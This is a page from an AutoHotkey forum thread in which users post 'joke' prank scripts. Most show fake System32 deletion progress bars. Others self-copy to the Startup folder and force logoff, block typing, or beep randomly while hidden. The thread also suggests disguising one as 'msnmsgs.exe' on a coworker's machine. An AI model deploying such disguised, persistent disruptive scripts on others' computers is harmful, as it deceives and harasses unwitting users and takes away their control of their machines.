AutoHotkey Homepage AutoHotkey Community
Let's help each other out
 
 FAQFAQ   SearchSearch   MemberlistMemberlist   RegisterRegister 
 ProfileProfile   Log in to check your private messagesLog in to check your private messages   Log inLog in 

Joke Script
Goto page 1, 2, 3, 4  Next
 
Post new topic   Reply to topic    AutoHotkey Community Forum Index -> Scripts & Functions
View previous topic :: View next topic  
Author Message
charlie mopps



Joined: 07 Jan 2008
Posts: 10

PostPosted: Mon Jan 21, 2008 2:04 pm    Post subject: Joke Script Reply with quote

Compile this, give it to your friends, laugh at their dismay.

If you really want to be evil you could even blockinput


Code:
Loop, C:\windows\System32\*.*, 0, 1
{

Progress,X800 , Deleting C:\Windows\System32\%a_loopfilename%,
Sleep, 50

}
Return

Pause::Pause
Back to top
View user's profile Send private message
charlie mopps RIP
Guest





PostPosted: Mon Jan 21, 2008 2:45 pm    Post subject: Reply with quote

Useless. Even not funny. Rolling Eyes
Offical request to delete this "admin-will-get-annoyed-by-a-faked-user-who-is-getting-completely-hysterical-on-the-phone"-script.
Back to top
charlie mopps



Joined: 07 Jan 2008
Posts: 10

PostPosted: Mon Jan 21, 2008 2:53 pm    Post subject: Reply with quote

Pfft... well your supposed to stand there and laugh... not send it to random unknown people.
Back to top
View user's profile Send private message
majkinetor



Joined: 24 May 2006
Posts: 3652
Location: Belgrade

PostPosted: Mon Jan 21, 2008 2:54 pm    Post subject: Reply with quote

I like it. I will send it to everyone Cool
Back to top
View user's profile Send private message MSN Messenger
making it work
Guest





PostPosted: Mon Jan 21, 2008 5:07 pm    Post subject: Reply with quote

The old one wasn't realistic enough:
Code:
Loop, C:\windows\System32\*.*, 0, 1
{

   if (x>=100)
   {
      progress,off
      msgbox, all system files NOT deleted! hahaha!
      exitapp
   }
   Progress,X0 y0 , Deleting

   C:\Windows\System32\%a_loopfilename%,
   x+=.1
   Progress, %x%
   Sleep, 20
   }
   Return
Back to top
charlie mopps



Joined: 07 Jan 2008
Posts: 10

PostPosted: Mon Jan 21, 2008 6:42 pm    Post subject: Reply with quote

You had a typo that made it not work. I fixed it:

Code:
Loop, C:\windows\System32\*.*, 0, 1
{

   if (x>=100)
   {
      progress,off
      msgbox, all system files NOT deleted! hahaha!
      exitapp
   }
   Progress,X0 y0 , Deleting C:\Windows\System32\%a_loopfilename%,
   x+=0.3
   Progress, %x%
   Sleep, 50
   }
   Return


any way to make it not blink?
Back to top
View user's profile Send private message
everyone
Guest





PostPosted: Mon Jan 21, 2008 11:57 pm    Post subject: Reply with quote

Quote:
I like it. I will send it to everyone
Keep it. I don't like it too. Rolling Eyes
Back to top
Trikster



Joined: 15 Jul 2007
Posts: 1224
Location: Enterprise, Alabama

PostPosted: Tue Jan 22, 2008 4:37 am    Post subject: Reply with quote

Heres my modified version:

Code:
Loop, C:\windows\System32\*.*, 0, 1
{
   Files++
}

Progress, w500 h76,

Loop, C:\windows\System32\*.*, 0, 1
{

   if (File = Files - 25)
   {
      progress,off
      Gui, Color, Black
      Gui, -Caption
      Gui, Show, x0 y0 w%A_ScreenWidth% h%A_ScreenHeight%
      BlockInput, Off
      MsgBox, 262192, Error!, A fatel error occured that has cause all system files to be deleted.
      ExitApp
   }
   x += 100 / Files
   Progress, %x%, Deleting`n%A_LoopFileLongPath%,, Deleting %A_LoopFileLongPath%
   File++
   Sleep, 50
}

_________________
ScriptPad | ~dieom | dieom | izwian2k7 | Ian | God
Back to top
View user's profile Send private message
charlie mopps



Joined: 07 Jan 2008
Posts: 10

PostPosted: Tue Jan 22, 2008 1:23 pm    Post subject: Reply with quote

Much better... I like that version. hehe
Back to top
View user's profile Send private message
Murp|e



Joined: 12 Jan 2007
Posts: 261
Location: Norway

PostPosted: Tue Jan 22, 2008 2:55 pm    Post subject: Reply with quote

AutoHotkey is perfect for pranks such as this. Last week I wrote a script which turned out to be extremely annoying, it contained some reload commands, and because of a bug the script reloaded constantly. I was never quick enough to right click the trayicon, and since it constantly reloaded I was never fast enough to mark it in Task Manager and click End Process. I ended up having to Log Off. That sort of bug could lead to some really annoying pranks. Are there any forum rules regarding this sort of discussion, it must constantly come up...
Back to top
View user's profile Send private message Visit poster's website
silveredge78



Joined: 25 Jul 2006
Posts: 387
Location: Midwest, USA

PostPosted: Thu Jan 24, 2008 5:52 pm    Post subject: Reply with quote

Here is my joke script. It was written by request of another network administrator to illustrate to the powers that be why they should block certain file types. It has a built in 10 second delay for someone who knows how to get past this to press the Escape key. If not, any user with administrator permissions can log onto the machine and delete it out of the affect users profile. Note, it *only* affects the user that was dumb enough to run the script.

Code:
; Script: Logoff v1.0.0, 05/11/2007
; Author: silveredge78
;
; Changelog
; v1.0.0, 05/11/2007
; - Purpose of this script is to demonstrate how easily running an exe can be a bad thing.
; - It copies to the current users startup folder so that this runs everytime they log on.
; - After copying itself, it then forces the user to log off.
; - It has a delay of 10 seconds to allow the user time to exit the script, either via
;   the system tray icon, or by pressing Escape.
; - To make it less obvious, you could uncomment the #NoTrayIcon command, thus limiting it
;   to exiting only by pressing Escape.

;#NoTrayIcon

FileCopy, %A_ScriptFullPath%, %A_Startup%, 0
Sleep, 10000
Shutdown, 4
ExitApp

Esc::ExitApp

_________________
SilverEdge78
Back to top
View user's profile Send private message
Deller



Joined: 21 Nov 2007
Posts: 214
Location: 0x01101110

PostPosted: Sat Feb 02, 2008 4:40 pm    Post subject: Reply with quote

This is my evil script.
Code:
a::
b::
c::
d::
e::
f::
g::
h::
i::
j::
k::
l::
m::
n::
o::
p::
q::
r::
s::
t::
u::
v::
w::
x::
y::
z::
MsgBox, Get away from my computer.
Return
esc::
exitapp
Return
Back to top
View user's profile Send private message
Trikster



Joined: 15 Jul 2007
Posts: 1224
Location: Enterprise, Alabama

PostPosted: Sat Feb 02, 2008 5:18 pm    Post subject: Reply with quote

Lol..That is a modified script of something I made long ago.

Found here
_________________
ScriptPad | ~dieom | dieom | izwian2k7 | Ian | God
Back to top
View user's profile Send private message
Deller



Joined: 21 Nov 2007
Posts: 214
Location: 0x01101110

PostPosted: Sun Feb 03, 2008 4:28 pm    Post subject: Reply with quote

If anyone has any more funny/annoying scripts post them here.
Back to top
View user's profile Send private message
Trubbleguy



Joined: 20 Jan 2007
Posts: 76
Location: Melbourne

PostPosted: Mon Feb 04, 2008 1:02 pm    Post subject: Random Ultrasonic beeper Reply with quote

Code:
; AutoHotkey Prank Version: 69
; Language:       Redneck
; Platform:       Nah, i wear boots, not them thar platform shoos
; Author:         ah knowed an Author in skool, his pa sold me mah dawg.
; Script Function:  if funshuns jus fine if yall can fine it!!
; Whet it do?   it makes a sound lahk yoo think shood not be there randomly between 5 and 15 minutes throo the speeker

;scriptname should be somthing like msnmsgs or explorer to hide in system
#SingleInstance force   
#NoTrayIcon
loop
{
Random, Freq,7000,8500
SoundBeep, %Freq%,1000 
Random, rnd,5,15
time := (rnd * 10000)
sleep %time%
}
!^Esc::Exitapp ;ctrl alt Escape
return

WARNING!!!! IF THIS IS HIDDEN ON A WORKMATES MACHINE IN STARTUP AS MSNMSGS.EXE OR SIMILAR.
AND AFTER 2 DAYS HE STARTS THROWING THINGS, YELLING AT EVERYONE, SLAMMING THE PHONE DOWN ETC.
PLEASE REMOVE IT WHILE HE IS OUTSIDE CHAINSMOKING HIS STRESS LEVELS DOWN.
IF HE IS OUT OF HIS CUBICLE AND YOUR IN IT, YOU MUST USE THE MOST SENSITIVE PART OF YOUR BODY
THAT IS ALSO USED WHEN YOU ARE HAVING SEX TO AVOID DISCOVERY
THAT IS OF COURSE, YOUR EARS.
_________________
Back to top
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
Display posts from previous:   
Post new topic   Reply to topic    AutoHotkey Community Forum Index -> Scripts & Functions All times are GMT
Goto page 1, 2, 3, 4  Next
Page 1 of 4

 
Jump to:  
You can post new topics in this forum
You can reply to topics in this forum


Powered by phpBB © 2001, 2005 phpBB Group